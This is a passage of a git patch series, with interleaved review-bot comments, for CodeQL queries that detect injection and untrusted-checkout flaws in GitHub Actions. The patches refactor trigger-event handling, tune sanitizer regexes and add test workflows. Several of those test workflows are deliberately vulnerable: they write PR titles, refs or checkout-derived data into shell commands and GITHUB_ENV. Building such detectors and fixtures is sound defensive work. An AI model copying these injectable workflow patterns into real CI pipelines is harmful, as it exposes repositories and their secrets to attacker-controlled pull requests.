+| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml |
+| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml |
+| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr |
.github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml |
+| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:7:3:7:19 | workflow_dispatch | .github/workflows/test10.yml |
+| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml |
+| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml |
+| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml |
+| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml |
+| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step |
.github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml |
+| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml |
+| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml |
+| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml |
+| .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml |
From a057b9dd4456c58d475a784a898acdbb81fbaa20 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 09:39:34 +0200 Subject: [PATCH 611/707] Add poisonable step for azure/powershell --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 2ee9af6904ed..e32bc48a9832 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -4,6 +4,7 @@ extensions: extensible: poisonableActionsDataModel # source: https://boostsecurityio.github.io/lotp/ data: + - ["azure/powershell"] - ["pre-commit/action"] - ["oxsecurity/megalinter"] - ["bridgecrewio/checkov-action"] From b2a3aaacfd0b1fecd8aa8a609c05eafec16950a5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 09:40:25 +0200 Subject: [PATCH 612/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 404c86d212cc..5cf09c3601f2 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.72 +version: 0.1.73 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 1296bbd667b1..25486553ea8b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.72 +version: 0.1.73 groups: [actions, queries] suites: codeql-suites extractor: javascript From d1d92ae68a25bee131e3fb60c5428cbc124027bc Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 10:13:20 +0200 Subject: [PATCH 613/707] Create getATriggerEvent for Steps and refactor the code to use it --- ql/lib/codeql/actions/Ast.qll | 6 +- ql/lib/codeql/actions/ast/internal/Ast.qll | 13 +- .../codeql/actions/dataflow/FlowSources.qll | 4 +- .../codeql/actions/security/ControlChecks.qll | 2 +- .../security/OutputClobberingQuery.qll | 2 +- .../security/UntrustedCheckoutQuery.qll | 12 +- .../CWE-829/ArtifactPoisoningPathTraversal.ql | 2 +- .../CWE-829/UntrustedCheckoutCritical.actual | 342 ------------------ .../UntrustedCheckoutCritical.expected | 2 + 9 files changed, 25 insertions(+), 360 deletions(-) delete mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index e41354ce31b6..ad7bd67a18c8 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -17,6 +17,8 @@ class AstNode instanceof AstNodeImpl { Job getEnclosingJob() { result = super.getEnclosingJob() } + Event getATriggerEvent() { result = super.getATriggerEvent() } + Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } CompositeAction getEnclosingCompositeAction() { result = super.getEnclosingCompositeAction() } @@ -100,8 +102,6 @@ class Workflow extends AstNode instanceof WorkflowImpl { Job getJob(string jobId) { result = super.getJob(jobId) } - Event getATriggerEvent() { result = super.getATriggerEvent() } - Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } @@ -200,8 +200,6 @@ abstract class Job extends AstNode instanceof JobImpl { Permissions getPermissions() { result = super.getPermissions() } - Event getATriggerEvent() { result = super.getATriggerEvent() } - Strategy getStrategy() { result = super.getStrategy() } string getARunsOnLabel() { result = super.getARunsOnLabel() } 
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 67ef99e0fc87..ce6db22636cc 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -111,6 +111,11 @@ abstract class AstNodeImpl extends TAstNode { result = this.getEnclosingCompositeAction().getACallerJob() } + /** + * Gets and Event triggering this node. + */ + EventImpl getATriggerEvent() { result = this.getEnclosingJob().getATriggerEvent() } + /** * Gets the enclosing Step. */ @@ -447,7 +452,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { ) } - EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } + override EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } } class WorkflowImpl extends AstNodeImpl, TWorkflowNode { @@ -486,7 +491,7 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } /** Gets the trigger event that starts this workflow. */ - EventImpl getATriggerEvent() { this.getOn().getAnEvent() = result } + override EventImpl getATriggerEvent() { this.getOn().getAnEvent() = result } /** Gets the strategy for this workflow. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } @@ -918,7 +923,7 @@ class JobImpl extends AstNodeImpl, TJobNode { StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } /** Gets the trigger event that starts this workflow. */ - EventImpl getATriggerEvent() { + override EventImpl getATriggerEvent() { if this.getEnclosingWorkflow() instanceof ReusableWorkflowImpl then result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() 
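Review bot: The QLDoc on the new `AstNodeImpl.getATriggerEvent()` in the `@@ -111,6 +111,11 @@` hunk reads `Gets and Event triggering this node.`; it should be `Gets an Event that triggers this node.` The default body delegates to `this.getEnclosingJob().getATriggerEvent()`, so a node with no enclosing job yields no trigger event at all unless its class overrides the method as `WorkflowImpl` and `CompositeActionImpl` do in the following hunks; stating that in the QLDoc would help callers of the new public `AstNode.getATriggerEvent()` wrapper, who otherwise have to read the implementation to learn when the result is empty. The `StepImpl` override added in the `@@ -1174,6 +1179,8 @@` hunk repeats the base body verbatim (`result = this.getEnclosingJob().getATriggerEvent()`) and can be dropped now that the method is inherited; if it is kept for emphasis, a one-line comment saying so would stop a future cleanup from looking like a behaviour change.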
@@ -1174,6 +1179,8 @@ class StepImpl extends AstNodeImpl, TStepNode { result = super.getEnclosingJob() } + override EventImpl getATriggerEvent() { result = this.getEnclosingJob().getATriggerEvent() } + EnvImpl getEnv() { result.getNode() = n.lookup("env") } /** Gets the ID of this step, if any. */ diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index e0d46c7196d5..0dca5bf45fb4 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -91,7 +91,7 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and not uses.getArgument("ref").matches("%base%") and - uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() + uses.getATriggerEvent().getName() = checkoutTriggers() ) or checkout instanceof GitMutableRefCheckout @@ -239,7 +239,7 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and not uses.getArgument("ref").matches("%base%") and - uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() + uses.getATriggerEvent().getName() = checkoutTriggers() ) or this.asExpr() instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 6293e4d6f3db..9b50a14bca2c 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -57,7 +57,7 @@ abstract class ControlCheck extends AstNode { // The check is effective against the event and category this.protectsCategoryAndEvent(category, event.getName()) and // The check can be triggered by the event - this.getEnclosingJob().getATriggerEvent() = event + this.getATriggerEvent() = event } predicate dominates(AstNode node) { 
diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 5850aa91e6e1..e6cc0d06a466 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -30,7 +30,7 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and not uses.getArgument("ref").matches("%base%") and - uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() + uses.getATriggerEvent().getName() = checkoutTriggers() ) or step instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index ea3f4c3c269f..01da214b6eaa 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -13,7 +13,7 @@ string checkoutTriggers() { */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - source.asExpr().getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and + source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and ( // remote flow sources source instanceof ArtifactSource @@ -79,7 +79,7 @@ module ActionsMutableRefCheckoutFlow = TaintTracking::Global Date: Wed, 23 Oct 2024 10:37:33 +0200 Subject: [PATCH 614/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5cf09c3601f2..608e186ffcd1 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.73 +version: 0.1.74 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 25486553ea8b..cdd396f985c6 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.73 +version: 0.1.74 groups: [actions, queries] suites: codeql-suites extractor: javascript From c9bb42a46ce043675aa1431667e2c0297733803a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:14:20 +0200 Subject: [PATCH 615/707] Enforce a checkout kind of trigger to consider gh pr/gh api ... pulls as a source of untrusted data --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 0dca5bf45fb4..7dfdc42b05e2 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -129,7 +129,13 @@ class GhCLICommandSource extends RemoteFlowSource, CommandSource { run.getScript().getAStmt() = cmd and cmd.indexOf("gh ") = 0 and untrustedGhCommandDataModel(cmd_regex, flag) and - cmd.regexpMatch(cmd_regex + ".*") + cmd.regexpMatch(cmd_regex + ".*") and + ( + cmd.regexpMatch(".*\\b(pr|pulls)\\b.*") and + run.getATriggerEvent().getName() = checkoutTriggers() + or + not cmd.regexpMatch(".*\\b(pr|pulls)\\b.*") + ) ) } From fef37b6025485c0ba0f80f1c07a62fafabdb6b1c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:15:26 +0200 Subject: [PATCH 616/707] Remove pull_request from context event map so that accesss to github.event.pull_request are not considered a source for pull_request triggers --- ql/lib/ext/config/context_event_map.yml | 4 ---- ql/lib/ext/config/externally_triggereable_events.yml | 1 - 2 files changed, 5 deletions(-) diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index a5e8ced2e9ed..35ccafc5beed 100644 
--- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -17,10 +17,6 @@ extensions: - ["issue_comment", "github.event.changes"] - ["gollum", "github.event.pages"] - ["gollum", "github.event.changes"] - - ["merge_group", "github.event.merge_group"] - - ["pull_request", "github.event.pull_request"] - - ["pull_request", "github.head_ref"] - - ["pull_request", "github.event.changes"] - ["pull_request_comment", "github.event.comment"] - ["pull_request_comment", "github.event.pull_request"] - ["pull_request_comment", "github.head_ref"] diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml index c3481c1cca5c..7d40620e9139 100644 --- a/ql/lib/ext/config/externally_triggereable_events.yml +++ b/ql/lib/ext/config/externally_triggereable_events.yml @@ -9,7 +9,6 @@ extensions: - ["watch"] - ["issue_comment"] - ["issues"] - - ["pull_request"] # non-privileged - ["pull_request_comment"] - ["pull_request_review"] - ["pull_request_review_comment"] From 315ffdff8d64e99fa6a247c7fd21f9da92d4607d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:15:54 +0200 Subject: [PATCH 617/707] Improve env var injection sanitizers --- .../actions/security/EnvVarInjectionQuery.qll | 49 ++++++++++++------- 1 file changed, 30 insertions(+), 19 deletions(-) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 99e9537a857d..656ea1207b51 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -10,7 +10,7 @@ string sanitizerCommand() { result = [ "tr\\s+(-d\\s*)?('|\")?.n('|\")?", // tr -d '\n' ' ', tr '\n' ' ' - "tr\\s+-cd\\s+.*:alpha:", // tr -cd '[:alpha:_]' + "tr\\s+-cd\\s+.*:al(pha|num):", // tr -cd '[:alpha:_]' "(head|tail)\\s+-n\\s+1" // head -n 1, tail -n 1 ] } 
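Review bot: The `@@ -17,10 +17,6 @@` hunk removes `- ["merge_group", "github.event.merge_group"]` alongside the three `pull_request` rows, but the commit message only describes removing `pull_request`; if dropping `merge_group` from the context-to-event map is intended, the message (and any changelog) should say so, and if not, the line should be restored. The `pull_request` removals themselves are consistent with the matching deletion from `externally_triggereable_events.yml` in the next hunk; the `pull_request_target` rows are outside the hunk, so I am assuming they remain.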
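Review bot: The trailing comment on the changed `sanitizerCommand()` entry still documents only `tr -cd '[:alpha:_]'` although the regex now also accepts `:alnum:`; update it to match the new behaviour and the `test18.yml` fixture, e.g. `"tr\\s+-cd\\s+.*:al(pha|num):", // tr -cd '[:alpha:_]', tr -cd '[:alnum:]_ -'`. Note that `.*` between `-cd` and `:al…:` lets the pattern match a character class that appears later in the same command line rather than in the `tr` argument; that predates this commit, but it is worth a comment if the looseness is deliberate.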
@@ -55,18 +55,23 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { * echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV */ class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { + CommandSource inCommand; + string injectedVar; + string command; + EnvVarInjectionFromCommandSink() { - exists(CommandSource source, Run run, string var | - this.asExpr() = source.getEnclosingRun().getScript() and - run = source.getEnclosingRun() and - run.getScript().getACmdReachingGitHubEnvWrite(source.getCommand(), var) and + exists(Run run | + this.asExpr() = inCommand.getEnclosingRun().getScript() and + run = inCommand.getEnclosingRun() and + run.getScript().getACmdReachingGitHubEnvWrite(inCommand.getCommand(), injectedVar) and ( - not run.getScript().getACmdReachingGitHubEnvWrite(_, var) + // the source flows to the injected variable without any command in between + not run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + command = "" or - exists(string sanitizer | - run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and - not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) - ) + // the source flows to the injected variable with a command in between + run.getScript().getACmdReachingGitHubEnvWrite(command, injectedVar) and + not command.regexpMatch(".*" + sanitizerCommand() + ".*") ) ) } 
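Review bot: The three new class fields `inCommand`, `injectedVar` and `command` in `EnvVarInjectionFromCommandSink` have no QLDoc, and `command` is bound to the sentinel `""` in the first disjunct to mean "written to `GITHUB_ENV` directly", which a reader of any getter built on these fields cannot guess. A short comment on each field would fix that, for example `/** The command the source value flows through before the GITHUB_ENV write, or "" when it is written directly. */` above `string command;`, with similar one-liners for the source command and the injected variable name. Whether getters for these fields exist is outside the hunk; if they do not, the fields could stay `exists(...)` variables as before.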
@@ -81,18 +86,24 @@ class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { * echo "FOO=$BODY" >> $GITHUB_ENV */ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { + string inVar; + string injectedVar; + string command; + EnvVarInjectionFromEnvVarSink() { - exists(Run run, string var_name, string var | - exists(run.getInScopeEnvVarExpr(var_name)) and + exists(Run run | run.getScript() = this.asExpr() and - run.getScript().getAnEnvReachingGitHubEnvWrite(var_name, var) and + exists(run.getInScopeEnvVarExpr(inVar)) and + run.getScript().getAnEnvReachingGitHubEnvWrite(inVar, injectedVar) and ( - not run.getScript().getACmdReachingGitHubEnvWrite(_, var) + // the source flows to the injected variable without any command in between + not run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + command = "" or - exists(string sanitizer | - run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and - not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) - ) + // the source flows to the injected variable with a command in between + run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + run.getScript().getACmdReachingGitHubEnvWrite(command, injectedVar) and + not command.regexpMatch(".*" + sanitizerCommand() + ".*") ) ) } @@ -122,7 +133,7 @@ class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { private module EnvVarInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - not source.(RemoteFlowSource).getSourceType() = "branch" + not source.(RemoteFlowSource).getSourceType() = ["branch", "username"] } predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink } From 43211d3286372f83747258215fb225e6c229a8ca Mon Sep 17 00:00:00 2001 
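Review bot: In the second disjunct of `EnvVarInjectionFromEnvVarSink`, the line `run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and` is redundant: it is implied by the next line `run.getScript().getACmdReachingGitHubEnvWrite(command, injectedVar) and`, which binds `command` to one such command. Removing it also makes the predicate mirror the sibling `EnvVarInjectionFromCommandSink` in the previous hunk, which has the same structure without the extra conjunct.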
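Review bot: The `isSource` change widens the exclusion to `["branch", "username"]` without saying why those source types are exempt, so the next maintainer has no way to tell whether adding or removing an entry is safe. Presumably the reasoning is that git ref names and GitHub usernames cannot contain the newline or delimiter characters needed to add an extra `GITHUB_ENV` entry, but that is inferred rather than visible here; a comment such as `// branch names and usernames cannot contain newlines, so they cannot add GITHUB_ENV entries` on the line above would pin it down.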
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:16:02 +0200 Subject: [PATCH 618/707] Update tests --- .../CWE-077/.github/workflows/test17.yml | 36 +++++++++++++++++ .../CWE-077/.github/workflows/test18.yml | 32 +++++++++++++++ .../CWE-077/.github/workflows/test19.yml | 40 +++++++++++++++++++ .../CWE-094/.github/workflows/test20.yml | 19 +++++++++ .../CWE-094/CodeInjectionCritical.expected | 1 - .../CWE-094/CodeInjectionMedium.expected | 2 - 6 files changed, 127 insertions(+), 3 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml new file mode 100644 index 000000000000..dbf8c94b308f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml 
@@ -0,0 +1,36 @@ +on: + push: + branches: [main] + workflow_dispatch: + inputs: + pypi: + type: boolean + description: Publish + +jobs: + publish: + runs-on: ubuntu-latest + permissions: + id-token: write + steps: + - name: Checkout code + uses: actions/checkout@v4 + with: + token: ${{ secrets._GITHUB_TOKEN }} + - name: Extract PR Details + env: + GH_TOKEN: ${{ secrets._GITHUB_TOKEN }} + run: | + # Check if the event is a pull request or pull_request_target + if [ "${{ github.event_name }}" = "pull_request" ] || [ "${{ github.event_name }}" = "pull_request_target" ]; then + PR_NUMBER=${{ github.event.pull_request.number }} + PR_TITLE=$(gh pr view $PR_NUMBER --json title --jq '.title') + else + # Use gh to find the PR associated with the commit + COMMIT_SHA=${{ github.event.after }} + PR_JSON=$(gh pr list --search "${COMMIT_SHA}" --state merged --json number,title --jq '.[0]') + PR_NUMBER=$(echo $PR_JSON | jq -r '.number') + PR_TITLE=$(echo $PR_JSON | jq -r '.title') + fi + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV + echo "PR_TITLE=$PR_TITLE" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml new file mode 100644 index 000000000000..1c4b1e863122 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml 
@@ -0,0 +1,32 @@ +on: + schedule: + - cron: '0 0 * * *' + pull_request: + types: [ opened, synchronize, reopened ] + branches: ["master", "*-rc"] + workflow_dispatch: + +jobs: + tests: + runs-on: ubuntu-latest + steps: + - name: Checkout Repository + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Set Branch Variables + id: set-branch-variables + env: + github_event_pull_request_head_repo_owner_login: ${{ github.event.pull_request.head.repo.owner.login }} + github_repository_owner: ${{ github.repository_owner }} + run: | + # Set the Repo Owner + REPO_OWNER="${github_event_pull_request_head_repo_owner_login:-$github_repository_owner}" + echo "REPO_OWNER=$REPO_OWNER" >> $GITHUB_ENV + - name: Sanitize Github Variables + id: sanitize-github-variables + env: + GITHUB_EVENT_PULL_REQUEST_TITLE: ${{ github.event.pull_request.title }} + run: | + # Delete non-alphanumeric characters and limit to 75 chars which is the branch title limit in GitHub + SAFE_PULL_REQUEST_TITLE=$(echo "${GITHUB_EVENT_PULL_REQUEST_TITLE}" | tr -cd '[:alnum:]_ -' | cut -c1-75) + echo "SAFE_PULL_REQUEST_TITLE=$SAFE_PULL_REQUEST_TITLE" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml new file mode 100644 index 000000000000..3b3b4b99ca10 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml 
@@ -0,0 +1,40 @@ +on: + pull_request: + workflow_dispatch: + +jobs: + build: + if: ${{ github.repository_owner == 'test' }} + runs-on: ubuntu-latest + steps: + - name: Get the appropriate Endo branch + id: branch + uses: actions/github-script@v7 + with: + result-encoding: string + script: |- + let branch = 'NOPE'; + if (context.payload.pull_request) { + const { body } = context.payload.pull_request; + const regex = /^\#endo-branch:\s+(\S+)/m; + const result = regex.exec(body); + if (result) { + branch = result[1]; + } + } + return branch; + - name: check out + id: checkout + if: steps.branch.outputs.result != 'NOPE' + uses: actions/checkout@v4 + with: + repository: test/test + path: ./tmp + ref: ${{ steps.branch.outputs.result }} + clean: 'false' + submodules: 'true' + persist-credentials: false + + - name: Find Netlify site ID + run: | + echo "NETLIFY_SITE_ID=$(cat COVERAGE_NETLIFY_SITE_ID)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml new file mode 100644 index 000000000000..27d8a666fc9e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml 
@@ -0,0 +1,19 @@ + +on: [ workflow_dispatch, pull_request ] +jobs: + test: + runs-on: ubuntu-20.04 + steps: + - name: Preliminary Information + run: | + echo "The job was automatically triggered by a ${{ github.event_name }} event." + echo "This job is now running on a ${{ runner.os }} server hosted by GitHub!" + echo "The name of your branch is ${{ github.ref }} and your repository is ${{ github.repository }}." + echo " " + echo "github.ref = ${{ github.ref }}" + echo "github.sha = ${{ github.sha }}" + echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" + echo "github.event.pull_request.head.sha = ${{ github.event.pull_request.head.sha }}" + echo "github.event.pull_request.base.ref = ${{ github.event.pull_request.base.ref }}" + echo "github.event.pull_request.base.sha = ${{ github.event.pull_request.base.sha }}" + echo " " diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 8a134a6f7ef3..dd9836805bd8 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 